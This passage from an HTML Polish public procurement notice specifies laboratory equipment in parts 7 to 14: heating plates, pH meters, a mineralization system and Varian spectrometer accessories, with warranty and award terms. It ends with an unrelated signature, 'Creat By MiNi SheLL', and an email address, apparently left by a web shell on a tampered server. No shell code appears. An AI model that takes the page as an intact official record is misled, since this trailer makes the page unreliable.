4.	Odporna chemicznie obudowa z aluminium pokrywanego PTFE. 
5.	Uziemiona, stalowa siatka ochronna zabezpiecza użytkownika przed porażeniem w przypadku zalania elementu grzejnego. 
6.	W obudowie powinny znajdować się uchwyty do mocowania statywów.
7.	Maksymalna temp. elementu grzejnego: 450st. C. 
8.	Zasilanie 220-240V, 50/60Hz. 
Zakres dostawy:
1.	Wielostanowiskowy płaszcz grzewczy - 1 szt.
Wymagane warunki dotyczące przedmiotu zamówienia:
1)	wymagany minimalny okres gwarancji - 24 miesięcy,
2)	instrukcja obsługi w języku polskim (dostarczona wraz z dostawą przedmiotu zamówienia),
3)	bezpłatne przeglądy techniczne w okresie gwarancji,
4)	przedmiot zamówienia musi być fabrycznie nowy,
5)	przedmiot zamówienia będzie dostarczony do siedziby zamawiającego (magazyn),
Wymagane przepisy i standardy
1)	Deklaracja zgodności
2)	Oznakowanie CE
3)	Certyfikat autoryzacyjny serwisu w zakresie prac serwisowych gwarancyjnych i pogwarancyjnych związanych z oferowanym urządzeniem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2013.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Cyfrowy laboratoryjny miernik wieloparametrowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cyfrowy, laboratoryjny miernik wieloparametrowy dla sensorów IDS (Intelligent Digital Sensors) o parametrach nie gorszych niż:
1.	Miernik dwukanałowy
2.	Pomiar czterech parametrów(pH, cond, oxi, ise) oraz temperatura z wykorzystaniem sensorów cyfrowych IDS
3.	Moduł umożliwiający podłączenia analogowych elektrod pH metrycznych z wtykami DIN i BNC
4.	Elektroda IDS pH/redox:
-Zakres pomiarowy pH: 0-14,000 z dokładnością plus/minus 0,004
-Zakres temperatury pomiaru: 0-100st.C
-Elektrolit odniesienia: 3 mol/l KCl
5.	Czujnik konduktometryczny IDS dwuelektrodowy z naczyniem przepływowym:
-Zakres pomiarowy:  0,01 - 200 mikroS/cm plus/minus 0,5 % wartości
-Opór właściwy: 5  - 100  plus/minus 0,5 % wartości
-Zakres temperatury pomiaru: 0-100st.C
6.	Równoczesne wyświetlanie dwóch parametrów oraz temperatury  
7.	Możliwość pomiaru dwóch tych samych parametrów jednocześnie 
8.	Kolorowy, podświetlany graficzny wyświetlacz LCD o wysokiej rozdzielczości 
9.	Oznaczenie poszczególnych parametrów kolorami 
10.	Dwa gniazda USB: 
-USB-1: przesyłanie danych bezpośrednio do pamięci USB 
-USB-2: przesyłanie danych do PC lub aktualizacja oprogramowania 
11.	Data oraz zegar czasu rzeczywistego 
12.	Pamięć danych automatyczna, do 10 000 zestawów 
13.	Wtyczki sensorów zabezpieczone przed nieumyślnym odłączeniem 
14.	Indywidualna identyfikacja sensorów/czujników przez miernik, automatyczne logowanie oraz import danych
15.	Identyfikacja wizualna używanego gniazda 
16.	Całkowita odporność sygnału pomiarowego na zakłócenia (bezpośrednia obróbka sygnału pomiarowego w sensorze) 
17.	Rejestrator zgodny z DPL/GLP (Dobra Praktyka Laboratoryjna)
18.	Funkcja QSC (Quality Sensor Control) 
19.	Funkcja CMC (Continuous Measurement Control) 
20.	Historia kalibracji zapisywana w pamięci sensora 
21.	Funkcja rejestrowania danych ręczna lub automatyczna (interwałowa) 5, 10, 30sek. oraz 1, 5, 10, 15, 30, 60min
22.	Duże klawisze
23.	Klawiatura antybakteryjna 
24.	Walizka transportowa
25.	Zasilanie bateryjne oraz sieciowe 
26.	Czas pracy w zasilaniu bateryjnym (bez podświetlenia) do 150 h 
Zakres dostawy:
1.	Cyfrowy, laboratoryjny miernik wieloparametrowy - 1szt.,
2.	 Akcesoria:  statyw, zasilacz, oprogramowanie oraz kabel USB.
3.	Cyfrowa elektroda pH - 1 szt.,
4.	Cyfrowy, przepływowy czujnik konduktometryczny - 1 szt.,
5.	Roztwory buforowe pH 4,01, pH 7,00 i pH 10,01 - po 1 szt.,
6.	Roztwór elektrodowy KCl c=3mol/l - 1 szt.,

Wymagane warunki dotyczące przedmiotu zamówienia:
1)	wymagany minimalny okres gwarancji - 24 miesięcy,
2)	instrukcja obsługi w języku polskim (dostarczona wraz z dostawą przedmiotu zamówienia),
3)	bezpłatne przeglądy techniczne w okresie gwarancji,
4)	przedmiot zamówienia musi być fabrycznie nowy,
5)	przedmiot zamówienia będzie dostarczony do siedziby zamawiającego (magazyn),
Wymagane przepisy i standardy
1)	Deklaracja zgodności
2)	Oznakowanie CE
3)	Certyfikat autoryzacyjny serwisu w zakresie prac serwisowych gwarancyjnych i pogwarancyjnych związanych z oferowanym urządzeniem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Płaszcz grzewczy z płynną regulacją temepratury.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Płaszcz grzewczy z płynną regulacją temperatury o parametrach nie gorszych niż:
1.	Moc grzewcza - 250 W.
2.	Temperatura grzania  do 350st.C.
3.	Gniazdo ceramiczne z wkładką aluminiową pokrytą włóknem szklanym.
4.	Pojemność kolby 500 ml.
5.	Możliwość podłączenia statywu w tylnej ścianie płaszcza.
6.	Zasilanie 230V 50/60Hz
Zakres dostawy:
1.	Płaszcz grzewczy z płynną regulacją temperatury - 1 szt.
Wymagane warunki dotyczące przedmiotu zamówienia:
1)	wymagany minimalny okres gwarancji - 24 miesięcy,
2)	instrukcja obsługi w języku polskim (dostarczona wraz z dostawą przedmiotu zamówienia),
3)	bezpłatne przeglądy techniczne w okresie gwarancji,
4)	przedmiot zamówienia musi być fabrycznie nowy,
5)	przedmiot zamówienia będzie dostarczony do siedziby zamawiającego (magazyn),
Wymagane przepisy i standardy
1)	Deklaracja zgodności
2)	Oznakowanie CE
3)	Certyfikat autoryzacyjny serwisu w zakresie prac serwisowych gwarancyjnych i pogwarancyjnych związanych z oferowanym urządzeniem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Płyta grzewcza.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Płyta grzewcza o parametrach nie gorszych niż:
1.	Moc grzewcza - 1500 W.
2.	Zakres temperatur  od 50st.C do 500st.C.
3.	Wyświetlacz LED.
4.	Szybkość grzania (1 dm3 wody) - 5 K/min.
5.	Dokładność nastawy +/- 10 K,
6.	Nastawny obwód zabezpieczający 550st.C.
7.	Wskaźnik ostrzegający przed dotknięciem gorącej płyty.
8.	Wyświetlanie komunikatów błędów.
9.	Płyta robocza - ceramiczna. 
10.	Wymiary płyty roboczej - 260 x 260 mm.
11.	Zasilanie 230V 50/60Hz
Zakres dostawy:
1.	Płyta grzewcza - 6 szt.
Wymagane warunki dotyczące przedmiotu zamówienia:
1)	wymagany minimalny okres gwarancji - 24 miesięcy,
2)	instrukcja obsługi w języku polskim (dostarczona wraz z dostawą przedmiotu zamówienia),
3)	bezpłatne przeglądy techniczne w okresie gwarancji,
4)	przedmiot zamówienia musi być fabrycznie nowy,
5)	przedmiot zamówienia będzie dostarczony do siedziby zamawiającego (magazyn),
Wymagane przepisy i standardy
1)	Deklaracja zgodności
2)	Oznakowanie CE
3)	Certyfikat autoryzacyjny serwisu na terenie Polski w zakresie prac serwisowych gwarancyjnych i pogwarancyjnych związanych z oferowanym urządzeniem,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Płyta grzewcza z mieszadłem magnetycznym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Płyta grzewcza  z mieszadłem magnetycznym o parametrach nie gorszych niż:
1.	Moc grzewcza - 250 W.
2.	Zakres temperatur  od 50st.C do 500st.C.
3.	Wyświetlacz LED.
4.	Dokładność nastawy +/- 1 K.
5.	Nastawny obwód zabezpieczający 550st.C [stały].
6.	Płyta robocza - ceramiczna.
7.	Wymiary płyty roboczej - 100 x 100 mm.
8.	Objętość mieszania - 5 dm3.
9.	Moc silnika (wejściowa/wyjściowa) - 15/1,5 W.
10.	Zakres prędkości - 100 - 1500 rpm.
11.	Maksymalne wymiary elementu mieszającego 30 x 8 mm.
12.	Zasilanie 230V 50/60Hz
Zakres dostawy:
1.	Płyta grzewcza - 2 szt.
Wymagane warunki dotyczące przedmiotu zamówienia:
1)	wymagany minimalny okres gwarancji - 24 miesięcy,
2)	instrukcja obsługi w języku polskim (dostarczona wraz z dostawą przedmiotu zamówienia),
3)	bezpłatne przeglądy techniczne w okresie gwarancji,
4)	przedmiot zamówienia musi być fabrycznie nowy,
5)	przedmiot zamówienia będzie dostarczony do siedziby zamawiającego (magazyn),
Wymagane przepisy i standardy
1)	Deklaracja zgodności
2)	Oznakowanie CE
3)	Certyfikat autoryzacyjny serwisu w zakresie prac serwisowych gwarancyjnych i pogwarancyjnych związanych z oferowanym urządzeniem,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2013.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Stacjonarny pH-metr.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Stacjonarny pH-metr o parametrach nie gorszych niż:
1.	pH-metr laboratoryjny, stacjonarny.
2.	Parametr mierzony - pH, mV, st.C.
3.	Zakres (pH) - 0,00 - 14,00.
4.	Rozdzielczość (pH) - co najmniej 0,01.
5.	Dokładność (pH) - co najmniej 0,01.
6.	Kalibracja - co najmniej do  5 punktów.
7.	Wyświetlacz LCD.
8.	Wyjście RS 232.
9.	Zasilanie 230V 50/60Hz
Zakres dostawy:
1.	Stacjonarny pH-metr laboratoryjny - 1 szt.
Wymagane warunki dotyczące przedmiotu zamówienia:
1)	wymagany minimalny okres gwarancji - 24 miesięcy,
2)	instrukcja obsługi w języku polskim (dostarczona wraz z dostawą przedmiotu zamówienia),
3)	bezpłatne przeglądy techniczne w okresie gwarancji,
4)	przedmiot zamówienia musi być fabrycznie nowy,
5)	przedmiot zamówienia będzie dostarczony do siedziby zamawiającego (magazyn),
Wymagane przepisy i standardy
1)	Deklaracja zgodności
2)	Oznakowanie CE
3)	Certyfikat autoryzacyjny serwisu w zakresie prac serwisowych gwarancyjnych i pogwarancyjnych związanych z oferowanym urządzeniem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> System do mineralizacji otwartej z wypsoażeniem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> System do mineralizacji otwartej  z wyposażeniem o parametrach nie gorszych niż:
1.	Blok grzewczy wykonany z grafitu pokrytego teflonem, odporny na działanie czynników korozyjnych
2.	Wbudowany panel sterowania
3.	Cyfrowy wyświetlacz umożliwiający odczyt czasu i temperatury
4.	Jednakowa temperatura w każdej próbce: +/-1st.C
5.	Temperatura maksymalna: 180st.C
6.	Zabezpieczenie przed przekroczeniem maksymalnej temperatury
7.	Stabilność temperatury: +/- 0.2st.C
8.	Możliwość umieszczenia jednocześnie co najmniej 9 naczyń o pojemności 50ml 
9.	 Sygnał dźwiękowy po zakończeniu programu
10.	 Urządzenie musi mieć możliwość wyposażenia w adaptery   umożliwiające pracę z naczyniami o średnicy 16mm.
11.	 Możliwość pracy z pięcioma różnymi metodami roztwarzania, w tym z co najmniej        trzema zainstalowanymi i zoptymalizowanymi  fabrycznie
12.	 Zasilanie: 230V 50/60Hz

Zakres dostawy:
1.	System do mineralizacji otwartej - 1szt.,
2.	Naczynia polipropylenowe wysokiej czystości z zakrętkami, pojemność 50ml, kalibrowane klasy A, posiadające boczne skrzydełka uniemożliwiające obrót naczynia w statywie - 750 szt.
3.	Szkiełka zegarkowe kompatybilne z naczyniami o pojemności 50ml - 1000 szt.,
4.	Naczynia teflonowe z zakrętkami, o pojemności 50 ml - 6 szt.,
5.	Statyw 24-pozycyjny, kompatybilny z naczyniami polipropylenowymi 50ml - 1 szt.,
6.	Statyw  12 pozycyjny kompatybilny z naczyniami polipropylenowymi  100ml - 2 szt.,
Wymagane warunki dotyczące przedmiotu zamówienia:
1)	wymagany minimalny okres gwarancji - 24 miesięcy,
2)	instrukcja obsługi w języku polskim i angielskim (dostarczona wraz z dostawą przedmiotu zamówienia),
3)	bezpłatne przeglądy techniczne w okresie gwarancji,
4)	przedmiot zamówienia musi być fabrycznie nowy,
5)	przedmiot zamówienia będzie dostarczony do siedziby zamawiającego (magazyn),
6)	instalacja i szkolenie przez dostawcę urządzenia musi zawierać się w cenie oferty,
Wymagane przepisy i standardy
1)	Deklaracja zgodności
2)	Oznakowanie CE
3)	Certyfikat autoryzacyjny serwisu w zakresie prac serwisowych gwarancyjnych i pogwarancyjnych związanych z oferowanym urządzeniem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Uzupełniające wyposażenie do spektrometrów firmy Varian.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Uzupełniające wyposażenie do spektrometrów firmy Varian o parametrach nie gorszych niż:
A	Przystawka do generacji wodorków
1.	Budowa modułowa umożliwiająca szybką wymianę modułu reakcyjnego w celu uniknięcia mieszania/płukania reagentów
2.	System oparty na trzykanałowej pompie perystaltycznej
3.	Przystawka umożliwiająca współpracę z aparatami będącymi na wyposażeniu laboratorium:
- spektrometr absorpcji atomowej Varian AA240FS
- spektrometr emisyjny Varian 720 - ES
4.	Maksymalna ilość próbki do wykonania oznaczenia - 8ml
5.	Wysoka precyzja oznaczeń RSD mniejsze od 2%
Zakres dostawy:
1.	Przystawka do generacji wodorków - 1szt.,
2.	Wszystkie niezbędne elementy umożliwiające podłączenie z posiadanymi aparatami

B)	System automatycznej zmiany próbek (autosampler)
1.	Autosampler co najmniej 180 pozycyjny
2.	Wbudowana pompa perystaltyczna umożliwiająca ciągłe płukanie portu myjącego
3.	Sterowanie systemem zmiany próbek z poziomu oprogramowania spektrometrów (SpectrAA oraz ICP Expert II)

Zakres dostawy:
1.	Kompletny system automatycznej zmiany próbek - 1szt.,
2.	Naczynka do wzorców - 50 szt.
3.	Naczynka na próbki - 200 szt.

C)	Laboratoryjna pompa perystaltyczna
1.	Pompa wyposażona w niskopulsacyjną 4 kanałową głowicę  12 rolkową
2.	Możliwość płynnej regulacji liczby obrotów pompy w zakresie 0-33 rpm umożliwiającą zmianę przepływu w zakresie 0,0017-20 ml / min.
3.	Każdy kanał z oddzielnie regulowaną siłą docisku i umożliwiający pracę z wężykami o różnych materiałach i średnicach
4.	Zmiana kierunku obrotów: prawo/lewo
5.	Możliwość zewnętrznej kontroli włączania szybkich obrotów
6.	Zasilanie 230V 50/60Hz
Zakres dostawy:
1.	Laboratoryjna pompa perystaltyczna - 1szt.,

Wymagane warunki dotyczące przedmiotu zamówienia (każdego elementu wchodząc ego w skład części Nr 14):
1)	wymagany minimalny okres gwarancji - 24 miesięcy,
2)	instrukcja obsługi w języku polskim (dostarczona wraz z dostawą przedmiotu zamówienia),
3)	bezpłatne przeglądy techniczne w okresie gwarancji,
4)	przedmiot zamówienia musi być fabrycznie nowy,
5)	przedmiot zamówienia będzie dostarczony do siedziby zamawiającego (magazyn),
6)	instalacja i szkolenie przez dostawcę urządzenia,
Wymagane przepisy i standardy
1)	Deklaracja zgodności
2)	Oznakowanie CE
3)	Certyfikat autoryzacyjny serwisu w zakresie prac serwisowych gwarancyjnych i pogwarancyjnych związanych z oferowanym urządzeniem,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. okres gwarancji - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com